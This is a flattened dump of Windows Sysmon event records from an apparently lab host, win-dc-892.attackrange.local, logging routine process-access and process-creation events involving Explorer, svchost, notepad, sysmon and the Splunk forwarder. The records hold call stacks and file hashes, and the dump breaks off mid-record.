AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.787{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84823DE8FA0438F16233C2B252880C76,SHA256=5F257E98953B3DB02FBCBBF299EC674249E8EEB0DA2B61D3D4D4E2BFD6D8A51F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.991{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.834{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6603B75C99CF45F80475FAA5F8E6489F,SHA256=5F19085231D1E17110E6BA8E80579C6CF3410F1698094E02B2306FD4F8107946,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.490{266CAFBE-6662-6064-6C01-00000000AE01}62485320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program 